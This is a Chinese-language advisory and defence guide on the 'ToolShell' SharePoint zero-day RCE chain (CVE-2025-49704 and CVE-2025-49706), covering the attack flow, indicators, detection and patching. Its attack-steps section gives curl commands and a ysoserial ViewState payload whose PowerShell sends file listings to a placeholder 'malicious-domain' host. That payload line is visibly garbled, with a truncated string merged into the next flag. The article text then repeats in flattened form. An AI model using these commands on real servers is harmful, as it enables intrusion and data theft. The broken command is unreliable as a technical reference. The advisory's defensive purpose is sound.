工具链漏洞预警:全球活跃利用中的SharePoint新型零日RCE攻击链
字数 1391 2025-08-30 06:50:27

SharePoint新型零日RCE攻击链(ToolShell)技术分析与防御指南

漏洞概述

2025年7月18日,Eye Security安全团队发现一起大规模利用Microsoft SharePoint远程代码执行(RCE)漏洞链的攻击活动,该漏洞链被命名为"ToolShell"。攻击者通过组合利用两个关键漏洞(CVE-2025-49704和CVE-2025-49706),可在无需认证的情况下完全控制本地部署的SharePoint服务器。

漏洞技术细节

漏洞链组成

  1. CVE-2025-49706 (CVSS 6.3)

    • 类型:SharePoint服务器欺骗漏洞
    • 作用:为后续攻击提供基础条件

  2. CVE-2025-49704 (CVSS 8.8)

    • 类型:通过ToolPane端点触发的SharePoint RCE漏洞
    • 关键路径:/_layouts/15/ToolPane.aspx
    • 特点:无需任何认证即可利用

攻击原理

攻击基于Code White GmbH曾在Pwn2Own上演示的概念验证代码,现已被完全武器化。攻击流程如下:

  1. 攻击者向/_layouts/15/ToolPane.aspx发送特制POST请求
  2. 植入隐蔽的ASPX恶意负载(spinstall0.aspx)
  3. 恶意负载窃取SharePoint服务器的MachineKey配置(包括ValidationKey和DecryptionKey)
  4. 利用获取的密钥生成有效的__VIEWSTATE令牌
  5. 通过ysoserial等工具签署恶意负载实现完全远程代码执行

攻击手法详解

关键攻击步骤

  1. 获取VIEWSTATEGENERATOR值

    curl -s https://target/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'

  2. 生成viewstate攻击负载

    ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://malicious-domain/?f=' + [uri]::EscapeDataString($_.Name)generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify

  3. 执行RCE攻击

    curl http://target/_layouts/15/success.aspx?__VIEWSTATE=<YSOSERIAL_GENERATED_PAYLOAD>

攻击特征

  • 恶意ASPX文件:spinstall0.aspx
  • 攻击IP示例:96.9.125.147
  • 攻击行为:
    • 通过PowerShell投放恶意ASPX负载
    • 窃取机器密钥建立持久化访问
    • 从可疑IP执行攻击模块

影响范围

  • 影响所有本地部署的SharePoint服务器
  • Eye Security扫描发现:8000余台暴露在公网的SharePoint服务器中已有数十台被入侵
  • 攻击仍在持续进行中(截至2025年7月19日)

检测方法

  1. 检查系统是否存在以下特征

    • 检查/ToolPane.aspx/spinstall0.aspx路径是否存在异常
    • 监控160字节的独特响应特征
    • 检查加密密钥是否泄露

  2. 监控异常活动

    • HTTP(S)外联连接
    • 反向Shell活动
    • 可疑的PowerShell执行记录

防御措施

紧急措施

  1. 安装补丁

    • 立即安装微软7月补丁星期二发布的最新SharePoint更新

  2. 密钥管理

    • 检查加密密钥是否泄露
    • 如已失窃需立即重新生成所有密钥

  3. 系统检查

    • 全面扫描系统入侵痕迹
    • 重点关注/_layouts/15/ToolPane.aspx/spinstall0.aspx路径

长期防护建议

  1. 网络防护

    • 限制SharePoint服务器的公网暴露
    • 实施严格的网络访问控制

  2. 监控与响应

    • 建立完善的日志监控机制
    • 设置异常行为告警

  3. 安全加固

    • 定期更新和补丁管理
    • 实施最小权限原则
    • 定期进行安全审计和渗透测试

参考资源

  • 微软官方安全指南
  • Eye Security完整技术报告
  • Palo Alto Networks Unit 42威胁情报
SharePoint新型零日RCE攻击链(ToolShell)技术分析与防御指南 漏洞概述 2025年7月18日,Eye Security安全团队发现一起大规模利用Microsoft SharePoint远程代码执行(RCE)漏洞链的攻击活动,该漏洞链被命名为"ToolShell"。攻击者通过组合利用两个关键漏洞(CVE-2025-49704和CVE-2025-49706),可在无需认证的情况下完全控制本地部署的SharePoint服务器。 漏洞技术细节 漏洞链组成 CVE-2025-49706 (CVSS 6.3) 类型:SharePoint服务器欺骗漏洞 作用:为后续攻击提供基础条件 CVE-2025-49704 (CVSS 8.8) 类型:通过ToolPane端点触发的SharePoint RCE漏洞 关键路径: /_layouts/15/ToolPane.aspx 特点:无需任何认证即可利用 攻击原理 攻击基于Code White GmbH曾在Pwn2Own上演示的概念验证代码,现已被完全武器化。攻击流程如下: 攻击者向 /_layouts/15/ToolPane.aspx 发送特制POST请求 植入隐蔽的ASPX恶意负载(spinstall0.aspx) 恶意负载窃取SharePoint服务器的MachineKey配置(包括ValidationKey和DecryptionKey) 利用获取的密钥生成有效的__ VIEWSTATE令牌 通过ysoserial等工具签署恶意负载实现完全远程代码执行 攻击手法详解 关键攻击步骤 获取VIEWSTATEGENERATOR值 生成viewstate攻击负载 执行RCE攻击 攻击特征 恶意ASPX文件:spinstall0.aspx 攻击IP示例:96.9.125.147 攻击行为: 通过PowerShell投放恶意ASPX负载 窃取机器密钥建立持久化访问 从可疑IP执行攻击模块 影响范围 影响所有本地部署的SharePoint服务器 Eye Security扫描发现:8000余台暴露在公网的SharePoint服务器中已有数十台被入侵 攻击仍在持续进行中(截至2025年7月19日) 检测方法 检查系统是否存在以下特征 检查 /ToolPane.aspx 和 /spinstall0.aspx 路径是否存在异常 监控160字节的独特响应特征 检查加密密钥是否泄露 监控异常活动 HTTP(S)外联连接 反向Shell活动 可疑的PowerShell执行记录 防御措施 紧急措施 安装补丁 立即安装微软7月补丁星期二发布的最新SharePoint更新 密钥管理 检查加密密钥是否泄露 如已失窃需立即重新生成所有密钥 系统检查 全面扫描系统入侵痕迹 重点关注 /_layouts/15/ToolPane.aspx 和 /spinstall0.aspx 路径 长期防护建议 网络防护 限制SharePoint服务器的公网暴露 实施严格的网络访问控制 监控与响应 建立完善的日志监控机制 设置异常行为告警 安全加固 定期更新和补丁管理 实施最小权限原则 定期进行安全审计和渗透测试 参考资源 微软官方安全指南 Eye Security完整技术报告 Palo Alto Networks Unit 42威胁情报